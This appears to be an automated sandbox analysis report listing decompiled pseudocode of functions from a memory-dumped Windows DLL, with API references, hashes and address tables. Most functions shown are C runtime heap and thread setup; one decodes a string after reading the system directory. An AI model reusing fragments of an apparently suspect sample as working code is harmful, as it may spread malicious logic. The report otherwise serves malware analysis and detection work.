                                                                                                                                                  0x6770c5ce
                                                                                                                                                  0x6770c5eb
                                                                                                                                                  0x6770c5eb
                                                                                                                                                  0x6770c5ef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c5da
                                                                                                                                                  0x6770c5dc
                                                                                                                                                  0x6770c5dc
                                                                                                                                                  0x6770c5e1
                                                                                                                                                  0x6770c5e6
                                                                                                                                                  0x6770c5e6
                                                                                                                                                  0x6770c5f1
                                                                                                                                                  0x6770c5fc
                                                                                                                                                  0x6770c601
                                                                                                                                                  0x6770c604
                                                                                                                                                  0x6770c60e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c610
                                                                                                                                                  0x6770c610
                                                                                                                                                  0x6770c61a
                                                                                                                                                  0x6770c66c
                                                                                                                                                  0x6770c66f
                                                                                                                                                  0x6770c674
                                                                                                                                                  0x6770c67c
                                                                                                                                                  0x6770c680
                                                                                                                                                  0x6770c68a
                                                                                                                                                  0x6770c61c
                                                                                                                                                  0x6770c61c
                                                                                                                                                  0x6770c61f
                                                                                                                                                  0x6770c627
                                                                                                                                                  0x6770c627
                                                                                                                                                  0x6770c62a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c62c
                                                                                                                                                  0x6770c62c
                                                                                                                                                  0x6770c637
                                                                                                                                                  0x6770c63c
                                                                                                                                                  0x6770c642
                                                                                                                                                  0x6770c6b7
                                                                                                                                                  0x6770c6be
                                                                                                                                                  0x6770c6c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c644
                                                                                                                                                  0x6770c647
                                                                                                                                                  0x6770c64d
                                                                                                                                                  0x6770c654
                                                                                                                                                  0x6770c6a1
                                                                                                                                                  0x6770c6a7
                                                                                                                                                  0x6770c6aa
                                                                                                                                                  0x6770c6b1
                                                                                                                                                  0x6770c6b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c656
                                                                                                                                                  0x6770c656
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c656
                                                                                                                                                  0x6770c654
                                                                                                                                                  0x6770c642
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c65a
                                                                                                                                                  0x6770c65a
                                                                                                                                                  0x6770c65d
                                                                                                                                                  0x6770c660
                                                                                                                                                  0x6770c665
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770c665
                                                                                                                                                  0x6770c61a
                                                                                                                                                  0x6770c5d0
                                                                                                                                                  0x6770c5d0
                                                                                                                                                  0x6770c5d0
                                                                                                                                                  0x6770c5d0
                                                                                                                                                  0x6770c68c
                                                                                                                                                  0x6770c6a0

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$__initmbctable
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2804101511-0
                                                                                                                                                  • Opcode ID: eac29e7452eec8bec3cf2cd680443fca3856f77f8ac7f98207a5334dbe445449
                                                                                                                                                  • Instruction ID: dd2f55648d263f78559c2b9107d04a9a3fba6f11dc93e9ce678413b6a3f66b4f
                                                                                                                                                  • Opcode Fuzzy Hash: eac29e7452eec8bec3cf2cd680443fca3856f77f8ac7f98207a5334dbe445449
                                                                                                                                                  • Instruction Fuzzy Hash: 8D31EEB574878089FB108B25EA143A937E1AB5EB8DF5C8A31CB5807749EF3DC0518321
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770ADA8, Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E6770ADA8(void* __eax, long long __rbx, signed long long __rcx, signed long long __rdx, intOrPtr* __r8, long long _a8) {
				void* _t11;
				intOrPtr* _t20;
				intOrPtr* _t22;
				signed long long _t24;
				signed long long _t27;
				signed long long _t28;
				void* _t30;

				_t27 = __rdx;
				_t24 = __rcx;
				_a8 = __rbx;
				_t22 = __r8;
				_t28 = __rdx;
				if(__rcx == 0) {
					L4:
					_t30 =  ==  ? _t20 : _t28 * _t24;
					do {
						_t11 = 0;
						if(_t30 > 0xffffffe0) {
							L7:
							if( *0x67718020 == 0) {
								if(_t22 != 0) {
									 *_t22 = 0xc;
								}
								L13:
								return _t11;
							}
							goto L8;
						}
						_t11 = RtlAllocateHeap(); // executed
						if(_t20 != 0) {
							goto L13;
						}
						goto L7;
						L8:
					} while (E67708C98(_t20, _t30) != 0);
					if(_t22 != 0) {
						 *_t22 = 0xc;
					}
					L3:
					_t11 = 0;
					goto L13;
				}
				_t2 = _t27 - 0x20; // -32
				_t20 = _t2;
				if(_t20 >= __rdx) {
					goto L4;
				} else {
					E6770851C(_t20);
					 *_t20 = 0xc;
					goto L3;
				}
			}










                                                                                                                                                  0x6770ada8
                                                                                                                                                  0x6770ada8
                                                                                                                                                  0x6770ada8
                                                                                                                                                  0x6770adb2
                                                                                                                                                  0x6770adb5
                                                                                                                                                  0x6770adbb
                                                                                                                                                  0x6770adda
                                                                                                                                                  0x6770ade6
                                                                                                                                                  0x6770adea
                                                                                                                                                  0x6770adea
                                                                                                                                                  0x6770adf0
                                                                                                                                                  0x6770ae0a
                                                                                                                                                  0x6770ae11
                                                                                                                                                  0x6770ae2f
                                                                                                                                                  0x6770ae31
                                                                                                                                                  0x6770ae31
                                                                                                                                                  0x6770ae37
                                                                                                                                                  0x6770ae41
                                                                                                                                                  0x6770ae41
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ae11
                                                                                                                                                  0x6770adff
                                                                                                                                                  0x6770ae08
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770ae13
                                                                                                                                                  0x6770ae1b
                                                                                                                                                  0x6770ae22
                                                                                                                                                  0x6770ae24
                                                                                                                                                  0x6770ae24
                                                                                                                                                  0x6770add6
                                                                                                                                                  0x6770add6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770add6
                                                                                                                                                  0x6770adbf
                                                                                                                                                  0x6770adbf
                                                                                                                                                  0x6770adc9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770adcb
                                                                                                                                                  0x6770adcb
                                                                                                                                                  0x6770add0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770add0

                                                                                                                                                  APIs
                                                                                                                                                  • _errno.LIBCMT ref: 6770ADCB
                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,?,00000000,6770C17F,?,?,?,67708DEF,?,?,?,67708525), ref: 6770ADFF
                                                                                                                                                  • _callnewh.LIBCMT ref: 6770AE16
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap_callnewh_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 638267422-0
                                                                                                                                                  • Opcode ID: ee47b807e58f7acd721872f6d82f565c463176d755f11daa8284d54f82e0f5cc
                                                                                                                                                  • Instruction ID: c4fc88ceb30933461e10d2904531c48c4c0971f1ca42b6bbccacd475a01243ab
                                                                                                                                                  • Opcode Fuzzy Hash: ee47b807e58f7acd721872f6d82f565c463176d755f11daa8284d54f82e0f5cc
                                                                                                                                                  • Instruction Fuzzy Hash: BB0175B231934485FF058B25D74576573E6A79DBE9F498A30CE2947798EB7CC0508701
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67708FD8, Relevance: 4.5, APIs: 3, Instructions: 35memorythreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 19%
                                                                                                                                                  			E67708FD8(void* __edx, void* __esi, long* __rax, void* __rcx, void* __rdx, void* __rdi, void* __rsi) {
				void* __rbx;
				intOrPtr _t5;
				long _t9;
				long* _t21;
				long* _t22;
				long* _t27;
				void* _t30;

				_t29 = __rsi;
				_t28 = __rdi;
				_t21 = __rax;
				E67708688(__rax); // executed
				_t5 = E6770CDA4(_t22, __rdi, __rsi);
				if(_t5 == 0) {
					L5:
					E67708CDC(_t5, _t22, _t29, _t30);
					return 0;
				}
				__imp__FlsAlloc();
				 *0x67716180 = _t5;
				if(_t5 == 0xffffffff) {
					goto L5;
				}
				_t5 = E6770C14C(_t22, 0x67708e64, __rdx, _t28, _t29, _t30);
				_t22 = _t21;
				if(_t21 == 0) {
					goto L5;
				}
				_t27 = _t21;
				__imp__FlsSetValue();
				if(_t5 == 0) {
					goto L5;
				}
				E67708D04(_t22, _t22, _t27);
				_t9 = GetCurrentThreadId();
				_t22[2] = _t22[2] | 0xffffffff;
				 *_t22 = _t9;
				return 1;
			}










                                                                                                                                                  0x67708fd8
                                                                                                                                                  0x67708fd8
                                                                                                                                                  0x67708fd8
                                                                                                                                                  0x67708fde
                                                                                                                                                  0x67708fe3
                                                                                                                                                  0x67708fea
                                                                                                                                                  0x6770904c
                                                                                                                                                  0x6770904c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709051
                                                                                                                                                  0x67708ff3
                                                                                                                                                  0x67708ff9
                                                                                                                                                  0x67709002
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770900e
                                                                                                                                                  0x67709013
                                                                                                                                                  0x67709019
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709021
                                                                                                                                                  0x67709024
                                                                                                                                                  0x6770902c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67709033
                                                                                                                                                  0x67709038
                                                                                                                                                  0x6770903e
                                                                                                                                                  0x67709043
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67708688: _initp_misc_winsig.LIBCMT ref: 677086B9
                                                                                                                                                    • Part of subcall function 67708688: EncodePointer.KERNEL32 ref: 6770D023
                                                                                                                                                    • Part of subcall function 6770CDA4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,67708FE8,?,?,?,677080FF), ref: 6770CDE9
                                                                                                                                                  • FlsAlloc.KERNEL32(?,?,?,677080FF), ref: 67708FF3
                                                                                                                                                    • Part of subcall function 6770C14C: Sleep.KERNEL32(?,?,?,67708DEF,?,?,?,67708525,?,?,?,?,6770707E), ref: 6770C191
                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,677080FF), ref: 67709024
                                                                                                                                                    • Part of subcall function 67708D04: _lock.LIBCMT ref: 67708D58
                                                                                                                                                    • Part of subcall function 67708D04: _lock.LIBCMT ref: 67708D77
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 67709038
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _lock$AllocCountCriticalCurrentEncodeInitializePointerSectionSleepSpinThreadValue_initp_misc_winsig
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3311150041-0
                                                                                                                                                  • Opcode ID: 6a29d2dee0eb528f9e2c9546b3bb7f42d80760b65e7805f9ee941b63b0732abf
                                                                                                                                                  • Instruction ID: dabe8b593cff3214afac033810f84d81d748ce43e998a4b4f606860ff61b8d1c
                                                                                                                                                  • Opcode Fuzzy Hash: 6a29d2dee0eb528f9e2c9546b3bb7f42d80760b65e7805f9ee941b63b0732abf
                                                                                                                                                  • Instruction Fuzzy Hash: 2CF04FF030A702C5FB449BB5D90835922D2AB6C769F484734C679CA2E0EFADC4A18716
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770441C, Relevance: 3.8, APIs: 3, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                  			E6770441C(char __ecx, char __edx, void* __edi, void* __esp, void* __eflags, intOrPtr* __rax, long long __rbx, signed long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t12;
				char _t19;
				void* _t21;
				char _t23;
				void* _t31;
				long long _t33;
				signed long long _t36;
				void* _t47;
				void* _t53;
				char* _t54;
				void* _t56;
				char* _t61;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t65 = __r8;
				_t36 = __rcx;
				_t33 = __rbx;
				_t31 = __rax;
				_t26 = __esp;
				_t25 = __edi;
				_t23 = __edx;
				_t22 = __ecx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				E67703BE0(__ecx, __edi, __esp, __rbx, __rdx, __r8);
				_t21 = 0;
				_t56 = _t31;
				if(_t31 != 0) {
					asm("repne scasb");
					_t53 =  !(_t36 | 0xffffffff) - 1;
					malloc(??);
					_t5 = _t56 + 1; // 0x1
					_t65 = _t5;
					_t50 = _t53;
					_t61 = _t31;
					E67707984(_t23, _t31, _t31, _t53, _t5);
					_t47 = _t56;
					free(??);
					_t56 = _t53 - 1;
					if(_t56 != 0) {
						_t54 = _t61;
						do {
							_t22 =  *_t54;
							_t19 = E67707900( *_t54, __edi, _t31, _t33, _t47, _t50, _t54, _t56, _t66, _t67, _t68, _t69);
							_t21 = _t21 + 1;
							 *_t54 = _t19;
							_t54 = _t54 + 1;
						} while (_t31 < _t56);
					}
					_t33 = _t61;
				}
				E6770397C(_t22, _t25, _t31, _t33, _t33, _t56);
				free(??);
				_t12 = E67703938(0x10, _t26, _t31, _t33, 0x67713018, _t31, _t65); // executed
				E67704578(_t12, _t22, 0x10, _t33, _t31, _t31, _t66); // executed
				E677039E8(_t25, _t26, _t31, _t31, _t31, _t31);
				return E677039E8(_t25, _t26, _t31, _t31, _t31, _t31);
			}




















                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x6770441c
                                                                                                                                                  0x67704421
                                                                                                                                                  0x67704426
                                                                                                                                                  0x67704430
                                                                                                                                                  0x67704435
                                                                                                                                                  0x67704437
                                                                                                                                                  0x6770443d
                                                                                                                                                  0x67704448
                                                                                                                                                  0x6770444d
                                                                                                                                                  0x67704454
                                                                                                                                                  0x67704459
                                                                                                                                                  0x67704459
                                                                                                                                                  0x6770445d
                                                                                                                                                  0x67704463
                                                                                                                                                  0x67704466
                                                                                                                                                  0x6770446b
                                                                                                                                                  0x6770446e
                                                                                                                                                  0x67704473
                                                                                                                                                  0x6770447a
                                                                                                                                                  0x6770447c
                                                                                                                                                  0x6770447f
                                                                                                                                                  0x6770447f
                                                                                                                                                  0x67704482
                                                                                                                                                  0x67704487
                                                                                                                                                  0x67704489
                                                                                                                                                  0x6770448d
                                                                                                                                                  0x67704490
                                                                                                                                                  0x6770447f
                                                                                                                                                  0x67704495
                                                                                                                                                  0x67704495
                                                                                                                                                  0x6770449b
                                                                                                                                                  0x677044a6
                                                                                                                                                  0x677044b7
                                                                                                                                                  0x677044c5
                                                                                                                                                  0x677044d0
                                                                                                                                                  0x677044f4

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67703BE0: GetSystemDirectoryA.KERNEL32 ref: 67703C09
                                                                                                                                                  • malloc.LIBCMT ref: 67704454
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                    • Part of subcall function 67707984: _errno.LIBCMT ref: 6770799C
                                                                                                                                                    • Part of subcall function 67707984: _invalid_parameter_noinfo.LIBCMT ref: 677079A8
                                                                                                                                                  • free.LIBCMT ref: 6770446E
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • free.LIBCMT ref: 677044A6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$Heapfree$AllocateDirectoryErrorFreeLastSystem_callnewh_invalid_parameter_noinfomalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1790312120-0
                                                                                                                                                  • Opcode ID: 24e7b52e7f8cadaf086220c98aeba3e394407c3cc287e438d2886cac334c8a0a
                                                                                                                                                  • Instruction ID: 5f3d76c2e4ab8eaf56d235d310d5f6715fb1bed904f69eb432c7df0dfccf9484
                                                                                                                                                  • Opcode Fuzzy Hash: 24e7b52e7f8cadaf086220c98aeba3e394407c3cc287e438d2886cac334c8a0a
                                                                                                                                                  • Instruction Fuzzy Hash: CF1136A072979044DE00EB376B1816CA7D1AB5EFECB884235DFAD47B88DF28C6528301
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67708688, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E67708688(long long __rax) {
				void* _t2;
				void* _t7;
				void* _t9;

				E67708CCC(); // executed
				_t7 = E6770D038(E6770D29C(E6770D2A4(E6770905C(E67708C90(_t2, __rax), __rax), __rax), __rax), __rax);
				__imp__EncodePointer(_t9);
				 *0x677183a0 = __rax;
				return _t7;
			}






                                                                                                                                                  0x6770868e
                                                                                                                                                  0x677086b9
                                                                                                                                                  0x6770d023
                                                                                                                                                  0x6770d029
                                                                                                                                                  0x6770d034

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EncodePointer_initp_misc_winsig
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2349294043-0
                                                                                                                                                  • Opcode ID: c05fc38fc3d0a45b7e06a76b076e648163dd0ca129c0ac2070c9e47231ff3da5
                                                                                                                                                  • Instruction ID: cc2effe261a123e4956d0188d39f1c2fc9585bde5c8fba362d30930def2f6f46
                                                                                                                                                  • Opcode Fuzzy Hash: c05fc38fc3d0a45b7e06a76b076e648163dd0ca129c0ac2070c9e47231ff3da5
                                                                                                                                                  • Instruction Fuzzy Hash: B9E01280795702C0DD08AB726E6932913D55B9EB58F981470CB0E0A310DE2DC1568705
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677038E4, Relevance: 2.5, APIs: 2, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                                  			E677038E4(void* __ecx, void* __esp, long long __rax, long long __rbx, long long __rsi, void* _a4, long long _a8, long long _a16) {
				void* _v4;
				void* _t10;

				_a8 = __rbx;
				_a16 = __rsi;
				if(__ecx != 0) {
					malloc(); // executed
					 *((intOrPtr*)(__rax)) = __ecx;
					malloc(??);
					 *((long long*)(__rax + 8)) = __rax;
					_t10 = memset(__ecx, 0, 0x10 << 0);
				} else {
					_t10 = 0;
				}
				return _t10;
			}





                                                                                                                                                  0x677038e4
                                                                                                                                                  0x677038e9
                                                                                                                                                  0x677038f7
                                                                                                                                                  0x67703902
                                                                                                                                                  0x6770390d
                                                                                                                                                  0x67703912
                                                                                                                                                  0x6770391a
                                                                                                                                                  0x67703923
                                                                                                                                                  0x677038f9
                                                                                                                                                  0x677038f9
                                                                                                                                                  0x677038f9
                                                                                                                                                  0x67703937

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                  • Opcode ID: 9853ca89de66d05c3729bc8b8427dd8965e20f9b5c75c900f869b5ae1d297bda
                                                                                                                                                  • Instruction ID: 179bc87af22c526df8cf9994c156d3e38c4c5da44289862c110b7a7f6998ab8d
                                                                                                                                                  • Opcode Fuzzy Hash: 9853ca89de66d05c3729bc8b8427dd8965e20f9b5c75c900f869b5ae1d297bda
                                                                                                                                                  • Instruction Fuzzy Hash: 99E02B3131478146DB448B27F61041EA5D5EB8CBC8B448435EB8983B48DF38C4A18700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677044F8, Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E677044F8(char __ecx, char __edx, void* __edi, void* __esp, void* __eflags, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t8;
				void* _t10;
				intOrPtr* _t22;
				void* _t25;
				intOrPtr* _t37;
				intOrPtr* _t40;
				void* _t45;
				void* _t46;

				_t22 = __rax;
				_t18 = __edi;
				_t17 = __edx;
				_t15 = __ecx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t25 = __rcx; // executed
				_t8 = E6770441C(__ecx, __edx, __edi, __esp, __eflags, __rax, __rcx, __rcx, __rdx, __rsi, __rbp, _t45); // executed
				_t37 = _t22;
				if(_t22 != 0) {
					E67704688(_t8, _t15, _t17, _t25, _t25, _t22, _t46);
					_t40 = _t22;
					__eflags = _t22;
					if(_t22 == 0) {
						goto L1;
					} else {
						malloc();
						r8d =  *_t22;
						E6770ED80( *_t22, _t22, _a8, _t45);
						E677039E8(_t18, __esp, _t22, _t25, _t37, _t22);
						_t10 = E677039E8(_t18, __esp, _t22, _t25, _t40, _t22);
					}
				} else {
					L1:
					_t10 = 0;
				}
				return _t10;
			}












                                                                                                                                                  0x677044f8
                                                                                                                                                  0x677044f8
                                                                                                                                                  0x677044f8
                                                                                                                                                  0x677044f8
                                                                                                                                                  0x677044f8
                                                                                                                                                  0x677044fd
                                                                                                                                                  0x67704502
                                                                                                                                                  0x6770450c
                                                                                                                                                  0x6770450f
                                                                                                                                                  0x67704514
                                                                                                                                                  0x6770451a
                                                                                                                                                  0x67704526
                                                                                                                                                  0x6770452b
                                                                                                                                                  0x6770452e
                                                                                                                                                  0x67704531
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704533
                                                                                                                                                  0x67704537
                                                                                                                                                  0x67704540
                                                                                                                                                  0x67704549
                                                                                                                                                  0x67704551
                                                                                                                                                  0x67704559
                                                                                                                                                  0x6770455e
                                                                                                                                                  0x6770451c
                                                                                                                                                  0x6770451c
                                                                                                                                                  0x6770451c
                                                                                                                                                  0x6770451c
                                                                                                                                                  0x67704575

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6770441C: malloc.LIBCMT ref: 67704454
                                                                                                                                                    • Part of subcall function 6770441C: free.LIBCMT ref: 6770446E
                                                                                                                                                    • Part of subcall function 6770441C: free.LIBCMT ref: 677044A6
                                                                                                                                                  • malloc.LIBCMT ref: 67704537
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                  • Opcode ID: b1c85340ac53741f14a4f1465a3cb7d687e00fad037ebb310b2ca762475b6268
                                                                                                                                                  • Instruction ID: 55bbd7519c9602e308ba50135ebb5c4e3cc42fcfb2494cc050101ea363ea0eb1
                                                                                                                                                  • Opcode Fuzzy Hash: b1c85340ac53741f14a4f1465a3cb7d687e00fad037ebb310b2ca762475b6268
                                                                                                                                                  • Instruction Fuzzy Hash: D3F096A131A78089DE04DB67B65401E67E0AB9EFC8B485438EF4E4BB09EF38C4518740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770C14C, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E6770C14C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t10;
				void* _t16;
				long long _t19;
				long long _t27;
				void* _t30;
				void* _t33;
				long long _t35;
				void* _t38;

				_t27 = __rdi;
				_t21 = __rbx;
				_t19 = _t35;
				 *((long long*)(_t19 + 8)) = __rbx;
				 *((long long*)(_t19 + 0x10)) = __rbp;
				 *((long long*)(_t19 + 0x18)) = __rsi;
				 *((long long*)(_t19 + 0x20)) = __rdi;
				_t30 = __rdx;
				_t33 = __rcx;
				r12d = r12d | 0xffffffff;
				while(1) {
					r8d = 0;
					_t10 = E6770ADA8(_t10, _t21, _t33, _t30, _t38); // executed
					_t21 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t16 =  *0x67718054 - _t10; // 0x0
					if(_t16 > 0) {
						Sleep();
						_t5 = _t27 + 0x3e8; // 0x3e8
						r11d = _t5;
						_t12 =  >  ? r12d : r11d;
						if(( >  ? r12d : r11d) != r12d) {
							continue;
						}
					}
					break;
				}
				return _t10;
			}











                                                                                                                                                  0x6770c14c
                                                                                                                                                  0x6770c14c
                                                                                                                                                  0x6770c14c
                                                                                                                                                  0x6770c14f
                                                                                                                                                  0x6770c153
                                                                                                                                                  0x6770c157
                                                                                                                                                  0x6770c15b
                                                                                                                                                  0x6770c167
                                                                                                                                                  0x6770c16a
                                                                                                                                                  0x6770c16d
                                                                                                                                                  0x6770c171
                                                                                                                                                  0x6770c171
